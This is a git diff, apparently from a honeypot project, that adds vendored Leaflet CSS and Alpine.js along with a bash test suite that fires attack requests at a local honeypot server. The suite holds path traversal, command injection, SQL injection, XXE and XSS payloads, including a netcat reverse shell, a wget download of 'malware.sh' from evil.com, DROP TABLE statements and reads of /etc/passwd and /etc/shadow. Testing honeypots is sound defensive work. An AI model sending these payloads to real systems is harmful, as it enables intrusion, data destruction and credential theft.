0}.leaflet-popup-tip-container{width:40px;height:20px;position:absolute;left:50%;margin-top:-1px;margin-left:-20px;overflow:hidden;pointer-events:none}.leaflet-popup-tip{width:17px;height:17px;padding:1px;margin:-10px auto 0;pointer-events:auto;-webkit-transform:rotate(45deg);-moz-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg)}.leaflet-popup-content-wrapper,.leaflet-popup-tip{background:#fff;color:#333;box-shadow:0 3px 14px rgba(0,0,0,.4)}.leaflet-container a.leaflet-popup-close-button{position:absolute;top:0;right:0;border:none;text-align:center;width:24px;height:24px;font:16px/24px Tahoma,Verdana,sans-serif;color:#757575;text-decoration:none;background:0 0}.leaflet-container a.leaflet-popup-close-button:focus,.leaflet-container a.leaflet-popup-close-button:hover{color:#585858}.leaflet-popup-scrolled{overflow:auto}.leaflet-oldie .leaflet-popup-content-wrapper{-ms-zoom:1}.leaflet-oldie .leaflet-popup-tip{width:24px;margin:0 auto}.leaflet-oldie .leaflet-control-layers,.leaflet-oldie 
.leaflet-control-zoom,.leaflet-oldie .leaflet-popup-content-wrapper,.leaflet-oldie .leaflet-popup-tip{border:1px solid #999}.leaflet-div-icon{background:#fff;border:1px solid #666}.leaflet-tooltip{position:absolute;padding:6px;background-color:#fff;border:1px solid #fff;border-radius:3px;color:#222;white-space:nowrap;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;pointer-events:none;box-shadow:0 1px 3px rgba(0,0,0,.4)}.leaflet-tooltip.leaflet-interactive{cursor:pointer;pointer-events:auto}.leaflet-tooltip-bottom:before,.leaflet-tooltip-left:before,.leaflet-tooltip-right:before,.leaflet-tooltip-top:before{position:absolute;pointer-events:none;border:6px solid transparent;background:0 0;content:""}.leaflet-tooltip-bottom{margin-top:6px}.leaflet-tooltip-top{margin-top:-6px}.leaflet-tooltip-bottom:before,.leaflet-tooltip-top:before{left:50%;margin-left:-6px}.leaflet-tooltip-top:before{bottom:0;margin-bottom:-12px;border-top-color:#fff}.leaflet-tooltip-bottom:before{top:0;margin-top:-12px;margin-left:-6px;border-bottom-color:#fff}.leaflet-tooltip-left{margin-left:-6px}.leaflet-tooltip-right{margin-left:6px}.leaflet-tooltip-left:before,.leaflet-tooltip-right:before{top:50%;margin-top:-6px}.leaflet-tooltip-left:before{right:0;margin-right:-12px;border-left-color:#fff}.leaflet-tooltip-right:before{left:0;margin-left:-12px;border-right-color:#fff}@media print{.leaflet-control{-webkit-print-color-adjust:exact;print-color-adjust:exact}} \ No newline at end of file diff --git a/src/templates/static/vendor/js/alpine.min.js b/src/templates/static/vendor/js/alpine.min.js new file mode 100644 index 0000000..a3be81c --- /dev/null +++ b/src/templates/static/vendor/js/alpine.min.js @@ -0,0 +1,5 @@ +(()=>{var nt=!1,it=!1,W=[],ot=-1;function Ut(e){Rn(e)}function Rn(e){W.includes(e)||W.push(e),Mn()}function Wt(e){let t=W.indexOf(e);t!==-1&&t>ot&&W.splice(t,1)}function Mn(){!it&&!nt&&(nt=!0,queueMicrotask(Nn))}function Nn(){nt=!1,it=!0;for(let 
e=0;ee.effect(t,{scheduler:r=>{st?Ut(r):r()}}),at=e.raw}function ct(e){N=e}function Yt(e){let t=()=>{};return[n=>{let i=N(n);return e._x_effects||(e._x_effects=new Set,e._x_runEffects=()=>{e._x_effects.forEach(o=>o())}),e._x_effects.add(i),t=()=>{i!==void 0&&(e._x_effects.delete(i),$(i))},i},()=>{t()}]}function ve(e,t){let r=!0,n,i=N(()=>{let o=e();JSON.stringify(o),r?n=o:queueMicrotask(()=>{t(o,n),n=o}),r=!1});return()=>$(i)}var Xt=[],Zt=[],Qt=[];function er(e){Qt.push(e)}function te(e,t){typeof t=="function"?(e._x_cleanups||(e._x_cleanups=[]),e._x_cleanups.push(t)):(t=e,Zt.push(t))}function Ae(e){Xt.push(e)}function Oe(e,t,r){e._x_attributeCleanups||(e._x_attributeCleanups={}),e._x_attributeCleanups[t]||(e._x_attributeCleanups[t]=[]),e._x_attributeCleanups[t].push(r)}function lt(e,t){e._x_attributeCleanups&&Object.entries(e._x_attributeCleanups).forEach(([r,n])=>{(t===void 0||t.includes(r))&&(n.forEach(i=>i()),delete e._x_attributeCleanups[r])})}function tr(e){for(e._x_effects?.forEach(Wt);e._x_cleanups?.length;)e._x_cleanups.pop()()}var ut=new MutationObserver(mt),ft=!1;function ue(){ut.observe(document,{subtree:!0,childList:!0,attributes:!0,attributeOldValue:!0}),ft=!0}function dt(){kn(),ut.disconnect(),ft=!1}var le=[];function kn(){let e=ut.takeRecords();le.push(()=>e.length>0&&mt(e));let t=le.length;queueMicrotask(()=>{if(le.length===t)for(;le.length>0;)le.shift()()})}function m(e){if(!ft)return e();dt();let t=e();return ue(),t}var pt=!1,Se=[];function rr(){pt=!0}function nr(){pt=!1,mt(Se),Se=[]}function mt(e){if(pt){Se=Se.concat(e);return}let t=[],r=new Set,n=new Map,i=new Map;for(let o=0;o{s.nodeType===1&&s._x_marker&&r.add(s)}),e[o].addedNodes.forEach(s=>{if(s.nodeType===1){if(r.has(s)){r.delete(s);return}s._x_marker||t.push(s)}})),e[o].type==="attributes")){let 
s=e[o].target,a=e[o].attributeName,c=e[o].oldValue,l=()=>{n.has(s)||n.set(s,[]),n.get(s).push({name:a,value:s.getAttribute(a)})},u=()=>{i.has(s)||i.set(s,[]),i.get(s).push(a)};s.hasAttribute(a)&&c===null?l():s.hasAttribute(a)?(u(),l()):u()}i.forEach((o,s)=>{lt(s,o)}),n.forEach((o,s)=>{Xt.forEach(a=>a(s,o))});for(let o of r)t.some(s=>s.contains(o))||Zt.forEach(s=>s(o));for(let o of t)o.isConnected&&Qt.forEach(s=>s(o));t=null,r=null,n=null,i=null}function Ce(e){return z(B(e))}function k(e,t,r){return e._x_dataStack=[t,...B(r||e)],()=>{e._x_dataStack=e._x_dataStack.filter(n=>n!==t)}}function B(e){return e._x_dataStack?e._x_dataStack:typeof ShadowRoot=="function"&&e instanceof ShadowRoot?B(e.host):e.parentNode?B(e.parentNode):[]}function z(e){return new Proxy({objects:e},Dn)}var Dn={ownKeys({objects:e}){return Array.from(new Set(e.flatMap(t=>Object.keys(t))))},has({objects:e},t){return t==Symbol.unscopables?!1:e.some(r=>Object.prototype.hasOwnProperty.call(r,t)||Reflect.has(r,t))},get({objects:e},t,r){return t=="toJSON"?Pn:Reflect.get(e.find(n=>Reflect.has(n,t))||{},t,r)},set({objects:e},t,r,n){let i=e.find(s=>Object.prototype.hasOwnProperty.call(s,t))||e[e.length-1],o=Object.getOwnPropertyDescriptor(i,t);return o?.set&&o?.get?o.set.call(n,r)||!0:Reflect.set(i,t,r)}};function Pn(){return Reflect.ownKeys(this).reduce((t,r)=>(t[r]=Reflect.get(this,r),t),{})}function Te(e){let t=n=>typeof n=="object"&&!Array.isArray(n)&&n!==null,r=(n,i="")=>{Object.entries(Object.getOwnPropertyDescriptors(n)).forEach(([o,{value:s,enumerable:a}])=>{if(a===!1||s===void 0||typeof s=="object"&&s!==null&&s.__v_skip)return;let c=i===""?o:`${i}.${o}`;typeof s=="object"&&s!==null&&s._x_interceptor?n[o]=s.initialize(e,c,o):t(s)&&s!==n&&!(s instanceof Element)&&r(s,c)})};return r(e)}function Re(e,t=()=>{}){let r={initialValue:void 0,_x_interceptor:!0,initialize(n,i,o){return e(this.initialValue,()=>In(n,i),s=>ht(n,i,s),i,o)}};return t(r),n=>{if(typeof n=="object"&&n!==null&&n._x_interceptor){let 
i=r.initialize.bind(r);r.initialize=(o,s,a)=>{let c=n.initialize(o,s,a);return r.initialValue=c,i(o,s,a)}}else r.initialValue=n;return r}}function In(e,t){return t.split(".").reduce((r,n)=>r[n],e)}function ht(e,t,r){if(typeof t=="string"&&(t=t.split(".")),t.length===1)e[t[0]]=r;else{if(t.length===0)throw error;return e[t[0]]||(e[t[0]]={}),ht(e[t[0]],t.slice(1),r)}}var ir={};function y(e,t){ir[e]=t}function fe(e,t){let r=Ln(t);return Object.entries(ir).forEach(([n,i])=>{Object.defineProperty(e,`$${n}`,{get(){return i(t,r)},enumerable:!1})}),e}function Ln(e){let[t,r]=_t(e),n={interceptor:Re,...t};return te(e,r),n}function or(e,t,r,...n){try{return r(...n)}catch(i){re(i,e,t)}}function re(e,t,r=void 0){e=Object.assign(e??{message:"No error message given."},{el:t,expression:r}),console.warn(`Alpine Expression Error: ${e.message} + +${r?'Expression: "'+r+`" + +`:""}`,t),setTimeout(()=>{throw e},0)}var Me=!0;function ke(e){let t=Me;Me=!1;let r=e();return Me=t,r}function R(e,t,r={}){let n;return x(e,t)(i=>n=i,r),n}function x(...e){return sr(...e)}var sr=xt;function ar(e){sr=e}function xt(e,t){let r={};fe(r,e);let n=[r,...B(e)],i=typeof t=="function"?$n(n,t):Fn(n,t,e);return or.bind(null,e,t,i)}function $n(e,t){return(r=()=>{},{scope:n={},params:i=[]}={})=>{let o=t.apply(z([n,...e]),i);Ne(r,o)}}var gt={};function jn(e,t){if(gt[e])return gt[e];let r=Object.getPrototypeOf(async function(){}).constructor,n=/^[\n\s]*if.*\(.*\)/.test(e.trim())||/^(let|const)\s/.test(e.trim())?`(async()=>{ ${e} })()`:e,o=(()=>{try{let s=new r(["__self","scope"],`with (scope) { __self.result = ${n} }; __self.finished = true; return __self.result;`);return Object.defineProperty(s,"name",{value:`[Alpine] ${e}`}),s}catch(s){return re(s,t,e),Promise.resolve()}})();return gt[e]=o,o}function Fn(e,t,r){let n=jn(t,r);return(i=()=>{},{scope:o={},params:s=[]}={})=>{n.result=void 0,n.finished=!1;let a=z([o,...e]);if(typeof n=="function"){let 
c=n(n,a).catch(l=>re(l,r,t));n.finished?(Ne(i,n.result,a,s,r),n.result=void 0):c.then(l=>{Ne(i,l,a,s,r)}).catch(l=>re(l,r,t)).finally(()=>n.result=void 0)}}}function Ne(e,t,r,n,i){if(Me&&typeof t=="function"){let o=t.apply(r,n);o instanceof Promise?o.then(s=>Ne(e,s,r,n)).catch(s=>re(s,i,t)):e(o)}else typeof t=="object"&&t instanceof Promise?t.then(o=>e(o)):e(t)}var wt="x-";function C(e=""){return wt+e}function cr(e){wt=e}var De={};function d(e,t){return De[e]=t,{before(r){if(!De[r]){console.warn(String.raw`Cannot find directive \`${r}\`. \`${e}\` will use the default order of execution`);return}let n=G.indexOf(r);G.splice(n>=0?n:G.indexOf("DEFAULT"),0,e)}}}function lr(e){return Object.keys(De).includes(e)}function pe(e,t,r){if(t=Array.from(t),e._x_virtualDirectives){let o=Object.entries(e._x_virtualDirectives).map(([a,c])=>({name:a,value:c})),s=Et(o);o=o.map(a=>s.find(c=>c.name===a.name)?{name:`x-bind:${a.name}`,value:`"${a.value}"`}:a),t=t.concat(o)}let n={};return t.map(dr((o,s)=>n[o]=s)).filter(mr).map(zn(n,r)).sort(Kn).map(o=>Bn(e,o))}function Et(e){return Array.from(e).map(dr()).filter(t=>!mr(t))}var yt=!1,de=new Map,ur=Symbol();function fr(e){yt=!0;let t=Symbol();ur=t,de.set(t,[]);let r=()=>{for(;de.get(t).length;)de.get(t).shift()();de.delete(t)},n=()=>{yt=!1,r()};e(r),n()}function _t(e){let t=[],r=a=>t.push(a),[n,i]=Yt(e);return t.push(i),[{Alpine:K,effect:n,cleanup:r,evaluateLater:x.bind(x,e),evaluate:R.bind(R,e)},()=>t.forEach(a=>a())]}function Bn(e,t){let r=()=>{},n=De[t.type]||r,[i,o]=_t(e);Oe(e,t.original,o);let s=()=>{e._x_ignore||e._x_ignoreSelf||(n.inline&&n.inline(e,t,i),n=n.bind(n,e,t,i),yt?de.get(ur).push(n):n())};return s.runCleanups=o,s}var Pe=(e,t)=>({name:r,value:n})=>(r.startsWith(e)&&(r=r.replace(e,t)),{name:r,value:n}),Ie=e=>e;function dr(e=()=>{}){return({name:t,value:r})=>{let{name:n,value:i}=pr.reduce((o,s)=>s(o),{name:t,value:r});return n!==t&&e(n,t),{name:n,value:i}}}var pr=[];function ne(e){pr.push(e)}function mr({name:e}){return 
hr().test(e)}var hr=()=>new RegExp(`^${wt}([^:^.]+)\\b`);function zn(e,t){return({name:r,value:n})=>{let i=r.match(hr()),o=r.match(/:([a-zA-Z0-9\-_:]+)/),s=r.match(/\.[^.\]]+(?=[^\]]*$)/g)||[],a=t||e[r]||r;return{type:i?i[1]:null,value:o?o[1]:null,modifiers:s.map(c=>c.replace(".","")),expression:n,original:a}}}var bt="DEFAULT",G=["ignore","ref","data","id","anchor","bind","init","for","model","modelable","transition","show","if",bt,"teleport"];function Kn(e,t){let r=G.indexOf(e.type)===-1?bt:e.type,n=G.indexOf(t.type)===-1?bt:t.type;return G.indexOf(r)-G.indexOf(n)}function J(e,t,r={}){e.dispatchEvent(new CustomEvent(t,{detail:r,bubbles:!0,composed:!0,cancelable:!0}))}function D(e,t){if(typeof ShadowRoot=="function"&&e instanceof ShadowRoot){Array.from(e.children).forEach(i=>D(i,t));return}let r=!1;if(t(e,()=>r=!0),r)return;let n=e.firstElementChild;for(;n;)D(n,t,!1),n=n.nextElementSibling}function E(e,...t){console.warn(`Alpine Warning: ${e}`,...t)}var _r=!1;function gr(){_r&&E("Alpine has already been initialized on this page. Calling Alpine.start() more than once can cause problems."),_r=!0,document.body||E("Unable to initialize. Trying to load Alpine before `` is available. 
Did you forget to add `defer` in Alpine's `" - -echo -e "\n=== Testing Common Probes ===" -curl -s "$TARGET/.env" -curl -s "$TARGET/wp-admin/" - -echo -e "\n=== Testing Shell Injection ===" -curl -s -X POST "$TARGET/ping" -d "host=127.0.0.1; cat /etc/passwd" - -echo -e "\n=== Done ===" diff --git a/tests/test_all_attacks.sh b/tests/test_all_attacks.sh new file mode 100644 index 0000000..a538f53 --- /dev/null +++ b/tests/test_all_attacks.sh @@ -0,0 +1,338 @@ +#!/bin/bash + +# Test script for all attack types in Krawl honeypot +# Tests: Path Traversal, XXE, Command Injection, SQL Injection, XSS + +# Colors for output +RED='\033[0;31m' +GREEN='\033[0;32m' +YELLOW='\033[1;33m' +BLUE='\033[0;34m' +NC='\033[0m' # No Color + +# Server configuration +SERVER_URL="${SERVER_URL:-http://localhost:1234}" +SLEEP_TIME="${SLEEP_TIME:-0.5}" + +echo -e "${BLUE}======================================${NC}" +echo -e "${BLUE} Krawl Honeypot Attack Test Suite${NC}" +echo -e "${BLUE}======================================${NC}" +echo "" +echo -e "${YELLOW}Testing server: ${SERVER_URL}${NC}" +echo "" + +# Function to print test header +test_header() { + echo "" + echo -e "${GREEN}[TEST]${NC} $1" + echo "----------------------------------------" +} + +# Function to print request info +request_info() { + echo -e "${YELLOW}Request:${NC} $1" +} + +# Function to print response +response_info() { + echo -e "${BLUE}Response (first 200 chars):${NC}" + echo "$1" | head -c 200 + echo "" + echo "" +} + +############################################# +# PATH TRAVERSAL ATTACKS +############################################# + +test_header "Path Traversal - /etc/passwd" +request_info "GET /../../../../etc/passwd" +RESPONSE=$(curl -s "${SERVER_URL}/../../../../etc/passwd") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - /etc/shadow" +request_info "GET /../../../etc/shadow" +RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/shadow") +response_info "$RESPONSE" +sleep $SLEEP_TIME + 
+test_header "Path Traversal - Windows path" +request_info "GET /..\\..\\..\\windows\\system32\\config\\sam" +RESPONSE=$(curl -s "${SERVER_URL}/..\\..\\..\\windows\\system32\\config\\sam") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - URL encoded" +request_info "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" +RESPONSE=$(curl -s "${SERVER_URL}/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - /proc/self/environ" +request_info "GET /../../../../proc/self/environ" +RESPONSE=$(curl -s "${SERVER_URL}/../../../../proc/self/environ") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Path Traversal - config file" +request_info "GET /../../config.php" +RESPONSE=$(curl -s "${SERVER_URL}/../../config.php") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# COMMAND INJECTION ATTACKS +############################################# + +test_header "Command Injection - cmd parameter with id" +request_info "GET /test?cmd=id" +RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=id") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - exec parameter with whoami" +request_info "GET /api/search?exec=whoami" +RESPONSE=$(curl -s "${SERVER_URL}/api/search?exec=whoami") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - command parameter with ls" +request_info "GET /admin?command=ls -la" +RESPONSE=$(curl -s "${SERVER_URL}/admin?command=ls%20-la") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - pipe with whoami" +request_info "GET /search?q=test|whoami" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=test|whoami") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - semicolon with id" +request_info "GET /page?id=1;id" +RESPONSE=$(curl -s "${SERVER_URL}/page?id=1;id") +response_info "$RESPONSE" +sleep $SLEEP_TIME + 
+test_header "Command Injection - double ampersand with cat" +request_info "GET /view?file=data.txt&&cat /etc/passwd" +RESPONSE=$(curl -s "${SERVER_URL}/view?file=data.txt&&cat%20/etc/passwd") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - command substitution" +request_info "GET /test?\$(whoami)" +RESPONSE=$(curl -s "${SERVER_URL}/test?\$(whoami)") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - backticks" +request_info "GET /test?\`id\`" +RESPONSE=$(curl -s "${SERVER_URL}/test?\`id\`") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - /bin/bash" +request_info "GET /shell?cmd=/bin/bash -c 'id'" +RESPONSE=$(curl -s "${SERVER_URL}/shell?cmd=/bin/bash%20-c%20'id'") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - netcat" +request_info "GET /test?cmd=nc -e /bin/sh 192.168.1.1 4444" +RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=nc%20-e%20/bin/sh%20192.168.1.1%204444") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - wget" +request_info "GET /test?cmd=wget http://evil.com/malware.sh" +RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=wget%20http://evil.com/malware.sh") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "Command Injection - uname -a" +request_info "GET /info?cmd=uname -a" +RESPONSE=$(curl -s "${SERVER_URL}/info?cmd=uname%20-a") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# SQL INJECTION ATTACKS +############################################# + +test_header "SQL Injection - single quote" +request_info "GET /user?id=1'" +RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - OR 1=1" +request_info "GET /login?user=admin' OR '1'='1" +RESPONSE=$(curl -s "${SERVER_URL}/login?user=admin'%20OR%20'1'='1") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection 
- UNION SELECT" +request_info "GET /product?id=1 UNION SELECT username,password FROM users" +RESPONSE=$(curl -s "${SERVER_URL}/product?id=1%20UNION%20SELECT%20username,password%20FROM%20users") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - SQL comment" +request_info "GET /search?q=test'--" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=test'--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - time-based blind" +request_info "GET /user?id=1' AND SLEEP(5)--" +RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'%20AND%20SLEEP(5)--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - information_schema" +request_info "GET /search?q=1' UNION SELECT table_name FROM information_schema.tables--" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=1'%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - stacked queries" +request_info "GET /user?id=1; DROP TABLE users--" +RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;%20DROP%20TABLE%20users--") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "SQL Injection - POST request" +request_info "POST /login with username=admin' OR '1'='1" +RESPONSE=$(curl -s -X POST "${SERVER_URL}/login" \ + -H "Content-Type: application/x-www-form-urlencoded" \ + -d "username=admin' OR '1'='1&password=anything") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# XXE INJECTION ATTACKS +############################################# + +test_header "XXE Injection - file:///etc/passwd" +request_info "POST /api/xml with XXE payload" +XXE_PAYLOAD=' + +]> + + &xxe; +' +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/xml" \ + -H "Content-Type: application/xml" \ + -d "$XXE_PAYLOAD") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XXE Injection - external entity" +request_info "POST /api/process with external entity" 
+XXE_PAYLOAD=' + + +]> +&bar;' +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/process" \ + -H "Content-Type: application/xml" \ + -d "$XXE_PAYLOAD") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XXE Injection - parameter entity" +request_info "POST /api/data with parameter entity" +XXE_PAYLOAD=' + + +%dtd; +]> +&send;' +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/data" \ + -H "Content-Type: application/xml" \ + -d "$XXE_PAYLOAD") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +############################################# +# XSS ATTACKS +############################################# + +test_header "XSS - script tag" +request_info "POST /api/contact with " +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \ + -H "Content-Type: application/json" \ + -d '{"name":"Test","email":"test@test.com","message":""}') +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - img onerror" +request_info "POST /api/contact with " +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \ + -H "Content-Type: application/json" \ + -d '{"name":"","email":"test@test.com","message":"Test"}') +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - javascript protocol" +request_info "GET /search?q=javascript:alert('XSS')" +RESPONSE=$(curl -s "${SERVER_URL}/search?q=javascript:alert('XSS')") +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - svg onload" +request_info "POST /api/comment with " +RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/comment" \ + -H "Content-Type: application/json" \ + -d '{"comment":""}') +response_info "$RESPONSE" +sleep $SLEEP_TIME + +test_header "XSS - iframe" +request_info "POST /api/contact with